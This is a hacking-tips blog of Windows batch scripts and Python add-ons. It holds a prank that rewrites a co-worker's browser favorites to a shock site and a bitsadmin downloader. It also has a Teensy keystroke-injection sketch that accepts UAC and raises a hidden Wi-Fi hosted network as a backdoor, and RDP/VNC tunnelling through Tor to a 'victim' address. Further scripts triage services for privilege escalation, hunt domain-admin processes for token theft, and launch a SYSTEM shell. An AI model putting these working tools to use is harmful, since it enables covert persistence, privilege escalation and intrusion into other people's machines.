Friday, March 23, 2012

Change the URLs in all .url files in the favorites folder

I wanted to play a joke on a co-worker and replace all the addresses in the .URL files in their favorites with a funnier (to me) address.

Now there are a lot of easier ways to do this, like making a generic .URL file, or just deleting them and downloading some new ones, but I wanted to make it difficult and parse through all the files, leaving everything intact and changing only the address in the URL= line.

-=The Script=-

@echo off
setlocal ENABLEDELAYEDEXPANSION
cd /d "%userprofile%\favorites"

:: Build a fresh copy of every .url file in %temp%, then swap the copies in.
:: Caveats of the for /f approach: blank lines are dropped, and a line containing
:: "!" would be mangled by delayed expansion; neither normally occurs in a .url file.
for %%g in (*.url) do (
    if exist "%temp%\%%g" del /f /q "%temp%\%%g"
    for /f "usebackq delims=" %%a in ("%%g") do (
        set "p=%%a"
        echo !p!
        set "u=!p:~0,4!"
        echo !u!
        if /i "!u!" == "URL=" (
            echo URL=http://lemonparty.org>> "%temp%\%%g"
        ) else (
            echo(!p!>> "%temp%\%%g"
        )
    )
)
del /f /q *.url
copy /y "%temp%\*.url" .
del /f /q "%temp%\*.url"
pause

Download from the internet with a batch file

So occasionally I want to write a script but I'll need it to download something from a website or wherever. Without using 3rd party utilities you're pretty well hosed in the windows world. Except for BITSadmin.

Bitsadmin is very handy for this process. Sometimes it doesn't work and spits out an error about the server not returning the file size; that is BITS insisting on a HEAD response with a Content-Length (and Range support) before it will start a job, so dynamically generated downloads with no length won't go through. For plain static files it's fairly reliable. Two caveats for anyone using it today: bitsadmin is deprecated in favour of the PowerShell BITS cmdlets (Start-BitsTransfer), and because it is a built-in that fetches and writes arbitrary files it is a well-known living-off-the-land binary, so a bitsadmin /transfer spawned from an odd parent process is exactly what process-creation monitoring and EDR rules look for.

-=The Script=-

@echo off
:: bitsadmin /transfer <job name> [/download] [/priority ...] <remote URL> <local file>
:: The local path must be absolute (hence %cd%); /transfer waits for the job and completes it.
bitsadmin /transfer jobname /download /priority normal http://addreess.com/file.ext "%cd%\whatever.ext"

Batch Ping Scan and Name Resolution

It's not fancy, but if you can't "import" any tools to a Windows system this will do a basic job of finding hosts and resolving their names.

Quick, simple, uses nothing but built-in components of the Windows system. Two things to keep in mind: hosts whose firewall drops ICMP echo (Windows Firewall does unless a rule such as File and Printer Sharing allows it) won't show up, so a miss here isn't proof a host is down; and the 60 ms timeout is fine on a local segment but will skip anything behind a slow link.

@echo off
Title Scan
mode con: cols=20 lines=5
echo    Enter Network:
echo [Example 192.168.1]
set /p network=
cls
mode con: cols=60 lines=254
title Scanning Network %network%.0/24
echo Scanning...
if exist ~temp1 del /f /q ~temp1
if exist ~temp2 del /f /q ~temp2
:: Match on "TTL=" rather than "reply": a dead address on the local subnet often yields
:: "Reply from <our own IP>: Destination host unreachable." which would count as up.
:: -w 60 is the per-probe timeout in ms; raise it for anything off the local segment.
for /L %%i in (1,1,254) do ping -n 1 -w 60 %network%.%%i | find /i "TTL=" >> ~temp1
:: "Reply from 192.168.1.5: bytes=32 ..." -> with ":" and " " as delimiters token 3 is the IP
for /f "tokens=3 delims=: " %%i in (~temp1) do echo %%i >> ~temp2
del /f /q ~temp1 > nul
cls
title Resolving Network %network%.0/24
:: nslookup prints "Name:    host.example" on success and "*** ... can't find ..." on failure
for /f %%i in (~temp2) do for /f "tokens=2 delims=: " %%g in ('nslookup %%i 2^>nul ^| find /i "name"') do echo %%i %%g
for /f %%i in (~temp2) do for /f "tokens=1 delims=: " %%g in ('nslookup %%i 2^>^&1 ^| find /i "***"') do echo %%i Hostname Lookup Failed
del /f /q ~temp2 > nul
pause
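Here's the same sweep as an added Python example (my code, not the post's script), mostly to show the one check the batch version lacks: it accepts any line containing "reply", and on a local subnet a dead address frequently produces "Reply from <your own address>: Destination host unreachable.", which is not a live host. The parser below counts only a reply from the probed address that carries a TTL, understands the Linux ping format as well, and runs the 254 probes in parallel. The addresses and ping output in SAMPLE_PING are constructed for the offline check; ping_once shells out to the real ping and reverse_lookup uses the system resolver, both of which are swappable so the logic can be exercised without a network.

```python
"""Ping sweep with a stricter 'alive' test than `find "reply"`, plus reverse lookup.

Added example, not the post's script.  Only an echo reply *from the probed address*
carrying a TTL field counts as a live host; "Destination host unreachable" replies
(which come from our own stack or gateway) do not.
"""
import re
import socket
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor

# Windows: "Reply from 192.168.1.5: bytes=32 time<1ms TTL=64"
# Linux:   "64 bytes from 192.168.1.5: icmp_seq=1 ttl=64 time=0.123 ms"
REPLY_RE = re.compile(
    r"^(?:Reply from|\d+ bytes from) (\d+\.\d+\.\d+\.\d+):.*\b(?:TTL|ttl)=\d+", re.M
)

# Constructed sample output for the offline check; the addresses are hypothetical.
SAMPLE_PING = {
    "192.168.1.5": "Pinging 192.168.1.5 with 32 bytes of data:\n"
                   "Reply from 192.168.1.5: bytes=32 time<1ms TTL=64\n",
    "192.168.1.6": "Pinging 192.168.1.6 with 32 bytes of data:\n"
                   "Reply from 192.168.1.20: Destination host unreachable.\n",
    "192.168.1.7": "Pinging 192.168.1.7 with 32 bytes of data:\n"
                   "Request timed out.\n",
}


def is_alive(target: str, ping_output: str) -> bool:
    """True only for an echo reply from `target` itself (i.e. one with a TTL)."""
    return any(m.group(1) == target for m in REPLY_RE.finditer(ping_output))


def ping_once(target: str, timeout_ms: int = 500) -> str:
    """Run the platform's ping for a single echo request and return its stdout."""
    if sys.platform.startswith("win"):
        cmd = ["ping", "-n", "1", "-w", str(timeout_ms), target]
    else:  # Linux ping takes whole seconds for -W
        cmd = ["ping", "-c", "1", "-W", str(max(1, timeout_ms // 1000)), target]
    return subprocess.run(cmd, capture_output=True, text=True).stdout


def reverse_lookup(ip: str) -> str:
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return "Hostname Lookup Failed"


def sweep(prefix: str, pinger=ping_once, resolver=reverse_lookup, workers: int = 64):
    """Probe prefix.1-254 in parallel; return [(ip, name)] for hosts that answered.
    `pinger` and `resolver` are injectable so the parsing can be tested offline."""
    hosts = [f"{prefix}.{i}" for i in range(1, 255)]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        outputs = list(pool.map(pinger, hosts))
    return [(h, resolver(h)) for h, out in zip(hosts, outputs) if is_alive(h, out)]


if __name__ == "__main__":
    net = sys.argv[1] if len(sys.argv) > 1 else input("Enter network (e.g. 192.168.1): ")
    for ip, name in sweep(net):
        print(ip, name)
```

Run it as `python sweep.py 192.168.1`; the output is the same "ip name" pairs the batch version prints, minus the false positives.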

Thursday, March 22, 2012

RDP Over Tor

Hello, my comrades in Russia

Sometimes I like to use Tor for stuff. Sometimes that stuff is the Remote Desktop Protocol.

This requires that you have Tor set up and know how to use it, and aren't an idiot who thinks just turning on Tor will make you invisible to the world.

You'll also need a handy little program called socat:
----------
UPDATE
----------
Since this is the most popular post I have (I'm looking at you Russia) I figured I'd be a decent guy and find the socat binaries on the web and link to them.
 
Here's the link for Socat:
Socat Binaries For Windows 
(French description on top, scroll to the bottom for English)
Respect to the Blog of the Nice Kiwi.

Extract that into one folder and add script from below.
Toss until evenly coated.

You'll need to adjust the path for where Tor is installed for you (the script assumes the Vidalia bundle's tor.exe). The same goes for the SOCKS port: a stand-alone Tor listens on 9050, but the Tor Browser bundle's Tor listens on 9150, so change socksport= to match.

-=The Script=-

@echo off
:: random console colour, 1-15
set /a c=%random% %% 15 + 1
if %c% EQU 1 color 01
if %c% EQU 2 color 0A
if %c% EQU 3 color 03
if %c% EQU 4 color 04
if %c% EQU 5 color 05
if %c% EQU 6 color 0D
if %c% EQU 7 color 07
if %c% EQU 8 color 0F
if %c% EQU 9 color 09
if %c% EQU 10 color 02
if %c% EQU 11 color 0B
if %c% EQU 12 color 0C
if %c% EQU 13 color 06
if %c% EQU 14 color 0E
if %c% EQU 15 color 09
cls
Title Starting TOR
Echo Connecting to the DarkWebs
:: start's /D takes the working directory; the program to run comes after it.
:: Point this at wherever your tor.exe lives.
start "TOR" /D "C:\progra~1\vidali~1\tor" tor.exe
cls
Title Meow~~~
echo ************
echo RDP over TOR
echo ************
echo +Enter Victim Address:
set /p victim=
cls
title Meow~~~ +%victim%
echo +Enter Victim Port:    *default 3389
set /p port=
if "%port%"=="" set port=3389
cls
title Meow~~~ +%victim%:%port%
echo +Enter Local Port to Listen on: *ex: 1234
set /p lport=
cls
title Meow~~~ +%victim%:%port% from 127.0.0.1:%lport%
echo #Give a CTRL+C to bail
echo +Launching MSTSC for you...
start mstsc /V:127.0.0.1:%lport%
echo +Connecting...
:: bind=127.0.0.1 keeps the forwarder off the LAN. SOCKS4A (not SOCKS4) hands the
:: hostname to Tor for resolution, so no DNS query for the target leaves this box.
:: socksport 9050 is the stand-alone/Vidalia Tor; the Tor Browser bundle uses 9150.
socat TCP4-LISTEN:%lport%,bind=127.0.0.1,reuseaddr,fork SOCKS4A:localhost:%victim%:%port%,socksport=9050
exit


***************
*BONUS STAGE*
***************
Same script except I got rid of the auto launch of mstsc and changed RDP to VNC in the text.

-=The Script=-
@echo off
:: random console colour, 1-15
set /a c=%random% %% 15 + 1
if %c% EQU 1 color 01
if %c% EQU 2 color 0A
if %c% EQU 3 color 03
if %c% EQU 4 color 04
if %c% EQU 5 color 05
if %c% EQU 6 color 0D
if %c% EQU 7 color 07
if %c% EQU 8 color 0F
if %c% EQU 9 color 09
if %c% EQU 10 color 02
if %c% EQU 11 color 0B
if %c% EQU 12 color 0C
if %c% EQU 13 color 06
if %c% EQU 14 color 0E
if %c% EQU 15 color 09
cls
Title Starting TOR
Echo Connecting to the DarkWebs
:: start's /D takes the working directory; the program to run comes after it.
start "TOR" /D "C:\progra~1\vidali~1\tor" tor.exe
cls
Title Meow~~~
echo ************
echo VNC over TOR
echo ************
echo +Enter Victim Address:
set /p victim=
cls
title Meow~~~ +%victim%
echo +Enter Victim Port:    *default 5900
set /p port=
if "%port%"=="" set port=5900
cls
title Meow~~~ +%victim%:%port%
echo +Enter Local Port to Listen on: *ex: 1234
set /p lport=
cls
title Meow~~~ +%victim%:%port% from 127.0.0.1:%lport%
echo Connect VNC to 127.0.0.1:%lport%
echo +Connecting...
:: Loopback-only listener, hostname resolved by Tor (SOCKS4A), 9150 for the Tor Browser bundle.
socat TCP4-LISTEN:%lport%,bind=127.0.0.1,reuseaddr,fork SOCKS4A:localhost:%victim%:%port%,socksport=9050
exit


Change your ports and any program that can run through SOCKS can be run through Tor with these scripts and socat. Two details on the socat line matter more than they look: SOCKS4A (as opposed to SOCKS4) passes the destination hostname to Tor, so the name is resolved inside the Tor circuit rather than by your local resolver (the only way a .onion address can work at all, and the difference between a clean session and a DNS leak), and binding the listener to 127.0.0.1 keeps you from offering the tunnel to everyone else on the LAN.
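To make the SOCKS4A point concrete, here is the handshake socat performs on each accepted connection, as an added Python example (mine, not the post's and not socat's code): the client builds a CONNECT request whose destination IP is the 0.0.0.x marker and whose hostname rides along at the end, and the proxy answers with an 8-byte grant or reject. A small loopback stand-in for Tor's SOCKS listener is included so both sides of the exchange can be seen offline; its "grant .onion names only" rule, the port numbers and the hostnames are constructed for the demo, not Tor behaviour.

```python
"""SOCKS4A CONNECT, the handshake behind `SOCKS4A:localhost:host:port,socksport=9050`.

Added example, not part of the post.  In plain SOCKS4 the client resolves the
destination name itself and sends an IP, so the DNS query for the target leaves
the box in the clear.  SOCKS4A sends DSTIP = 0.0.0.x (x != 0) plus the hostname
and the proxy (Tor) resolves it.  The MockTorSocks class is a constructed
stand-in for Tor's SOCKS port so the exchange can be driven on loopback.
"""
import socket
import struct
import threading

SOCKS_VERSION, CMD_CONNECT = 4, 1
REPLY_GRANTED, REPLY_REJECTED = 0x5A, 0x5B


def build_socks4a_connect(hostname: str, port: int, userid: bytes = b"") -> bytes:
    """VN CD DSTPORT DSTIP USERID NUL HOSTNAME NUL; DSTIP 0.0.0.1 is the 4A marker."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return (struct.pack("!BBH4s", SOCKS_VERSION, CMD_CONNECT, port, b"\x00\x00\x00\x01")
            + userid + b"\x00" + hostname.encode("idna") + b"\x00")


def parse_socks4a_request(data: bytes):
    """Proxy side: return (port, hostname, userid).  A plain SOCKS4 request (real
    DSTIP, no hostname) is rejected: that client already leaked the name to DNS."""
    if len(data) < 9 or data[0] != SOCKS_VERSION or data[1] != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT request")
    port = struct.unpack("!H", data[2:4])[0]
    dstip, rest = data[4:8], data[8:]
    userid, sep, rest = rest.partition(b"\x00")
    if not sep:
        raise ValueError("unterminated USERID")
    if not (dstip[:3] == b"\x00\x00\x00" and dstip[3] != 0):
        raise ValueError("plain SOCKS4 request: name was resolved client-side")
    hostname, sep, _ = rest.partition(b"\x00")
    if not sep or not hostname:
        raise ValueError("missing hostname")
    return port, hostname.decode("idna"), userid


def build_socks4_reply(granted: bool) -> bytes:
    """VN(0) CD DSTPORT DSTIP; port and address are ignored for CONNECT."""
    return struct.pack("!BBH4s", 0, REPLY_GRANTED if granted else REPLY_REJECTED, 0, b"\x00" * 4)


def parse_socks4_reply(data: bytes) -> bool:
    if len(data) != 8 or data[0] != 0:
        raise ValueError("malformed SOCKS4 reply")
    return data[1] == REPLY_GRANTED


class MockTorSocks(threading.Thread):
    """Loopback stand-in for Tor's SOCKS listener (constructed for the demo).
    It grants CONNECT only for .onion names so both outcomes can be observed."""

    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.seen = []

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                try:  # one recv is enough for a request this small on loopback
                    port, host, _ = parse_socks4a_request(conn.recv(1024))
                    self.seen.append((host, port))
                    conn.sendall(build_socks4_reply(host.endswith(".onion")))
                except ValueError:
                    conn.sendall(build_socks4_reply(False))


def socks4a_connect(proxy_port: int, hostname: str, port: int,
                    proxy_host: str = "127.0.0.1") -> bool:
    """Client side of what socat does per connection: open the SOCKS port, send
    the 4A request, report whether the proxy granted the tunnel."""
    with socket.create_connection((proxy_host, proxy_port), timeout=5) as s:
        s.sendall(build_socks4a_connect(hostname, port))
        return parse_socks4_reply(s.recv(8))


if __name__ == "__main__":
    proxy = MockTorSocks()
    proxy.start()
    print("onion   :", socks4a_connect(proxy.port, "abcdefghijklmnop.onion", 3389))
    print("clearnet:", socks4a_connect(proxy.port, "intranet.example", 5900))
```

Against a real Tor, point socks4a_connect at 9050 (or 9150) and, after a grant, whatever you write to the same socket goes out through the circuit; that is exactly what socat does with the bytes mstsc sends it.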

Arduino Win7 wireless backdoor.

I picked up a Teensy a while back. If you don't have one and you like either causing trouble or penetration testing I HIGHLY recommend you pick one up.

Anyways, I learned about an interesting feature in Windows 7 that (if your wireless card supports it) allows you to create a software AP. So then you can connect to that and share your internet connection... or set it up without the user's knowledge, install a bind shell, and have a very hard to find wireless backdoor.

Now there are a few things that I really like about this.
1) The computer it's set up on doesn't pick up the new wireless network. So while their computer is now broadcasting a new network, when they scan for available wireless networks, they don't pick it up.
2) There's no notifications to the user.
3) You can script it.
4) It'll drive some poor admin NUTS trying to find the physical access point some stupid end user plugged in somewhere.

So I set about to make my teensy emulate a keyboard and type out all the commands I wanted then dump a bind shell and activate it.

Here's the code to start cmd.exe as administrator (this assumes UAC is enabled), and enter the commands to enable a new soft ap with ssid Blakhal0 and wpa passphrase Iamsupercool.

// Teensyduino sketch; set USB Type to "Keyboard" so the board enumerates as a HID keyboard.
// Delays are generous on purpose: the Start menu, the UAC prompt and the elevated
// console all have to be up before the next keystrokes arrive, or they land in the wrong window.
void setup() { }
void loop(){
  delay(10000);                                 // let Windows finish enumerating the "keyboard"
  Keyboard.set_modifier(MODIFIERKEY_GUI);       // tap the Windows key: Start menu with the search box focused
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print("cmd");
  delay(500);
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);  // Ctrl+Shift+Enter = run elevated
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);       // Alt+Y = "Yes" on the UAC prompt
  Keyboard.send_now();
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 
  delay(1000);
  // Register the hosted network (needs the elevated console) ...
  Keyboard.print("netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  // ... then bring it up.
  Keyboard.print("netsh wlan start hostednetwork");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000); 
  Keyboard.print("exit");                       // close the console; the hosted network keeps running
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(999999);                                // done; park here so loop() does not retype everything
}

There are a lot of other people who are way better than I am at writing compact code for the Arduino. I THINK over at Irongeek's website there are some space-saving functions you can mangle into your code to cut down the bloat.
www.irongeek.com

You can figure out the dropping the bind shell on your own you lazy mooches.
Having it drop the bind shell is left as an exercise to the reader.

I did send this to Dave Kennedy (ReL1K) www.secmaniac.com to integrate into SET as an arduino payload but I've yet to see it as an option. Or maybe I just didn't see it in the change log, I mean it's not like he releases 15,000 revisions (a day) when he gets on a roll. And I haven't had the occasion to need to use SET in a while.

So for those playing at home the batch equivalent of this is pretty easy to figure out since, well, it's right in there. Of course you're missing the need to run as administrator part, but if you happen to pop a shell on a Windows 7 box with wireless you can give this a try, or if you're psexec'd in. Again it'll only work if the wireless card will support it and you have to be administrator or better; `netsh wlan show drivers` tells you up front ("Hosted network supported : Yes"), and many newer Windows 10 drivers report No. Most of the wireless cards I've tested it with worked out of the box or just needed a firmware update. I haven't found any (out of the 5 I've tested) that flat out wouldn't work. For the admin on the other side, the giveaway isn't a rogue box on the wall: it's a "Microsoft Virtual WiFi Miniport Adapter" showing up in the adapter list and `netsh wlan show hostednetwork` reporting Started on a client that has no business running an AP.

-=The Script=-

@echo off
:: Needs an elevated prompt and a driver that reports
:: "Hosted network supported : Yes" under netsh wlan show drivers.
netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool
netsh wlan start hostednetwork
exit

Services Report

I was checking for weaknesses in services on a remote machine one time but going through them one at a time was annoying and I really wanted to just have a text file with all the info I could transfer off the machine to peruse at my leisure. So I made this. It enumerates all the services and then does a sc query on them and dumps the output to a text file.

It could be improved by running icacls (cacls on older boxes) against the BINARY_PATH_NAME of each service to see whether Users or Everyone have write or modify access to the binary or its folder, and by flagging unquoted paths that contain spaces, the other classic service privesc. Feel free to improve on it.

-=The Script=-

@echo off
:: Start clean so a re-run does not append to stale lists.
for %%f in (test.txt test2.txt clean.txt finally.txt) do if exist %%f del /f /q %%f
:: "state= all" includes stopped services; SERVICE_NAME lines carry the short name.
sc query state= all | find /i "SERVICE_NAME:" >> test.txt
:: "SERVICE_NAME: name" -> everything after the first space (names can contain spaces)
for /f "tokens=2* delims= " %%a in (test.txt) do echo %%a %%b>> test2.txt
:: Round-trip through :sub1 to drop the trailing space left behind when %%b is empty.
for /f "tokens=* delims=" %%x in (test2.txt) do (
call :sub1 %%x)
goto :next

:sub1
if %1'==' goto :eof
echo %*>> clean.txt
goto :eof

:next
:: sc qc prints START_TYPE, BINARY_PATH_NAME and SERVICE_START_NAME; the 4096 is the
:: buffer size, since the default is too small for services with long paths/dependencies.
for /f "tokens=* delims=" %%v in (clean.txt) do sc qc "%%v" 4096 >> finally.txt
del /f /q test.txt
del /f /q test2.txt
del /f /q clean.txt
exit
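Here is the "cacls report" improvement carried through, as an added Python example (my code, not the post's script): it parses `sc qc` output for the image path and run-as account, parses `icacls` output for ACEs that give low-privilege principals write or modify rights, and flags an unquoted image path with spaces, listing the files Windows' CreateProcess would try before the real binary. The sc/icacls text below is constructed in the real layout of those tools; the service, its path and its ACL are hypothetical. Parsing runs anywhere; run_live shells out to sc.exe and icacls.exe and so needs Windows.

```python
"""Service privesc triage from `sc qc` and `icacls` output.

Added example, not the post's script.  Two checks: (1) an unquoted image path
containing spaces, which CreateProcess resolves by trying "C:\Program.exe",
"C:\Program Files\Vuln.exe", ... before the real file, so write access to an
earlier directory hijacks the service; (2) ACEs on the image that grant write
or modify rights to principals every local user belongs to.
"""
import re
import subprocess

# Constructed samples in the layout of `sc qc <name>` and `icacls <path>`;
# the service, path and ACL are hypothetical.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VulnSvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Vuln App\bin\service.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Vulnerable Example Service
        DEPENDENCIES       : RpcSs
        SERVICE_START_NAME : LocalSystem
"""
SAMPLE_ICACLS = r"""C:\Program Files\Vuln App\bin\service.exe BUILTIN\Users:(I)(M)
                                           NT AUTHORITY\SYSTEM:(I)(F)
                                           BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals any local user effectively belongs to (compared case-insensitively).
WEAK_PRINCIPALS = {"everyone", r"builtin\users", r"nt authority\authenticated users",
                   r"nt authority\interactive"}
# icacls rights that allow replacing the file or dropping a file in the directory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC"}


def parse_sc_qc(text: str) -> dict:
    """'KEY : value' lines into a dict (SERVICE_NAME sits on its own line)."""
    cfg = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def image_path(binary_path_name: str):
    """Return (exe_path, quoted).  For an unquoted value the SCM cannot know where
    the path ends, so, like it, take everything up to the first '.exe' token."""
    if binary_path_name.startswith('"'):
        return binary_path_name[1:binary_path_name.index('"', 1)], True
    m = re.match(r"(.*?\.exe)(?=\s|$)", binary_path_name, re.IGNORECASE)
    return (m.group(1) if m else binary_path_name), False


def hijack_candidates(path: str) -> list:
    """Files CreateProcess probes before the real one, in order."""
    return [path[:i] + ".exe" for i, ch in enumerate(path) if ch == " "]


def parse_icacls(text: str, path: str) -> list:
    """[(principal, {rights})]; the first ACE shares its line with the path."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = re.match(r"^(.+?):((?:\([^)]*\))+)$", line)
        if m:
            rights = {r.strip() for grp in re.findall(r"\(([^)]*)\)", m.group(2))
                      for r in grp.split(",")}
            aces.append((m.group(1), rights))
    return aces


def weak_write_aces(icacls_text: str, path: str) -> list:
    return [(who, sorted(rights & WRITE_RIGHTS))
            for who, rights in parse_icacls(icacls_text, path)
            if who.lower() in WEAK_PRINCIPALS and rights & WRITE_RIGHTS]


def assess(sc_text: str, icacls_text: str = "") -> dict:
    cfg = parse_sc_qc(sc_text)
    path, quoted = image_path(cfg.get("BINARY_PATH_NAME", ""))
    return {
        "service": cfg.get("SERVICE_NAME"),
        "account": cfg.get("SERVICE_START_NAME"),
        "image": path,
        "unquoted_candidates": [] if quoted or " " not in path else hijack_candidates(path),
        "weak_write_aces": weak_write_aces(icacls_text, path) if icacls_text else [],
    }


def run_live(service: str) -> dict:
    """Windows only: gather both outputs for a real service and assess them."""
    sc = subprocess.run(["sc", "qc", service, "4096"], capture_output=True, text=True).stdout
    path, _ = image_path(parse_sc_qc(sc).get("BINARY_PATH_NAME", ""))
    ic = subprocess.run(["icacls", path], capture_output=True, text=True).stdout
    return assess(sc, ic)
```

Feed run_live each name from the clean.txt list and anything with a non-empty unquoted_candidates or weak_write_aces, running as LocalSystem, is worth a closer look. Check the candidate directories with icacls as well: for the sample, write access to C:\ or C:\Program Files\ is as good as write access to the binary.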

Find Processes Running as a Domain Admin

You'll need a user account that's admin on all the local machines to run this one.

Searches all running processes on all computers reported from net view for a username that matches one from the file names.txt (you make that yourself). I suppose this could be augmented with another script to dump net localgroup administrators /domain (or, for the group the title actually refers to, net group "Domain Admins" /domain) and parse that out into the names.txt file. I'll leave that as an exercise to the reader.

Useful for finding a token to steal or maybe a process to inject into. Two things to know before running it on someone else's network: the password you type ends up on the tasklist command line, where process-creation auditing with command-line logging records it, and tasklist /S against every host in net view is noisy (one authenticated RPC session per box). net view also only shows what the browser service knows about, so it's a partial list on anything bigger than a workgroup.

-=The Script=-

@echo off
echo Enter Username
set /p user=
echo Enter Password
set /p password=
if exist ips.txt del /f /q ips.txt
Echo Parsing Results...
rem net view prints 3 header lines, "\\HOST  remark" rows, then "The command completed successfully."
rem Splitting on "\" and " " leaves the bare host name as token 1.
for /f "skip=3 tokens=1 delims=\ " %%i in ('net view') do if not "%%i"=="The" echo %%i >> ips.txt
rem tasklist /V adds the "User Name" column; names.txt holds one account name per line.
FOR /F %%i in (ips.txt) DO @echo [+] %%i && @tasklist /V /S %%i /U %user% /P %password% 2>NUL > output.txt && FOR /F %%n in (names.txt) DO @type output.txt | findstr /i %%n > NUL && echo [!] %%n was found running a process on %%i && pause
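The same hunt done with parsing instead of findstr, as an added Python example (mine, not the post's script). It fills the names.txt gap by parsing `net group "Domain Admins" /domain`, and it asks tasklist for CSV (/FO CSV) so the User Name column is read exactly rather than grepped out of a fixed-width table, which avoids a name like "bob" matching "bobby" or a window title. The net group and tasklist output below is constructed in the real layout of those commands; the ACME domain, hosts, users and PIDs are hypothetical. run_live needs Windows and the same admin credentials the batch version asks for.

```python
"""Flag processes owned by privileged domain accounts from `tasklist /V /FO CSV`.

Added example, not the post's script.  Sample outputs are constructed; the
ACME domain, the hosts and the users are hypothetical.
"""
import csv
import io
import subprocess

SAMPLE_NET_GROUP = """Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            jdoe                     svc_backup
The command completed successfully.
"""

SAMPLE_TASKLIST_CSV = '''"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"
"System Idle Process","0","Services","0","8 K","Unknown","NT AUTHORITY\\SYSTEM","0:12:34","N/A"
"explorer.exe","2312","Console","1","61,204 K","Running","ACME\\jdoe","0:00:05","N/A"
"notepad.exe","4021","Console","1","8,120 K","Running","ACME\\bob","0:00:00","Untitled - Notepad"
"svchost.exe","812","Services","0","12,004 K","Unknown","N/A","0:00:00","N/A"
'''


def parse_net_group_members(text: str) -> set:
    """Member names are printed in columns between the dashed rule and the trailer
    line; split on whitespace and lower-case (Windows names are case-insensitive)."""
    members, in_members = set(), False
    for line in text.splitlines():
        if line.startswith("-----"):
            in_members = True
        elif in_members and not line.startswith("The command completed"):
            members.update(name.lower() for name in line.split())
    return members


def parse_tasklist_csv(text: str) -> list:
    """One dict per process; csv handles the quoted, comma-containing Mem Usage field."""
    return list(csv.DictReader(io.StringIO(text)))


def privileged_processes(tasklist_csv: str, domain: str, admins: set) -> list:
    """[(image, pid, user)] for processes whose owner is DOMAIN\\<member of admins>."""
    hits = []
    for row in parse_tasklist_csv(tasklist_csv):
        user = row.get("User Name", "")
        if "\\" not in user:          # "N/A" when the caller cannot see the owner
            continue
        dom, _, name = user.partition("\\")
        if dom.lower() == domain.lower() and name.lower() in admins:
            hits.append((row["Image Name"], int(row["PID"]), user))
    return hits


def run_live(host: str, user: str, password: str, domain: str) -> list:
    """Windows only.  /U /P place the password on the command line, where
    process-creation auditing (event 4688 with command-line logging) records it."""
    group_out = subprocess.run(["net", "group", "Domain Admins", "/domain"],
                               capture_output=True, text=True).stdout
    task_out = subprocess.run(["tasklist", "/V", "/FO", "CSV", "/S", host,
                               "/U", user, "/P", password],
                              capture_output=True, text=True).stdout
    return privileged_processes(task_out, domain, parse_net_group_members(group_out))
```

Loop run_live over the host list and you get (image, pid, owner) tuples instead of a pause prompt, which is what you want when the next step is picking a PID to migrate into.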

Start cmd.exe as system in 1 minute

Not sure exactly why I wrote this one but it's come in handy a few times. For those times when Admin rights just aren't enough...

Starts cmd.exe running as SYSTEM via the AT task scheduler one minute from the time the script is run. A few caveats: it needs the Task Scheduler service running and local admin rights; on Vista and later the /interactive window lands in session 0, where you won't see it (on XP/2003 it pops up on your desktop); and at.exe itself was dropped in Windows 8/Server 2012, where the equivalent is a schtasks task with /ru SYSTEM, or psexec -s.

-=The Script=-

@echo off
:: %time% looks like "13:05:42.17"; hours below 10 print as " 9" on some locales,
:: so strip spaces.  Leading zeros are stripped too, because set /a treats
:: "08" and "09" as (invalid) octal.
set "hr=%time:~0,2%"
set "mn=%time:~3,2%"
set "hr=%hr: =%"
if "%hr:~0,1%"=="0" set "hr=%hr:~1%"
if "%mn:~0,1%"=="0" set "mn=%mn:~1%"
:: One minute from now, with minute and hour rollover (the original version
:: bailed out at xx:x9 and at the top of the hour).
set /a mn+=1
if %mn% GEQ 60 set /a mn=0, hr+=1
if %hr% GEQ 24 set hr=0
if %mn% LSS 10 set mn=0%mn%
if %hr% LSS 10 set hr=0%hr%
echo Scheduling cmd.exe as SYSTEM at %hr%:%mn%
:: /interactive asks for the window on the console session; needs the Task
:: Scheduler service and local admin rights.
at %hr%:%mn% /interactive cmd.exe
pause

Ghetto As All Get Out Port Scanner

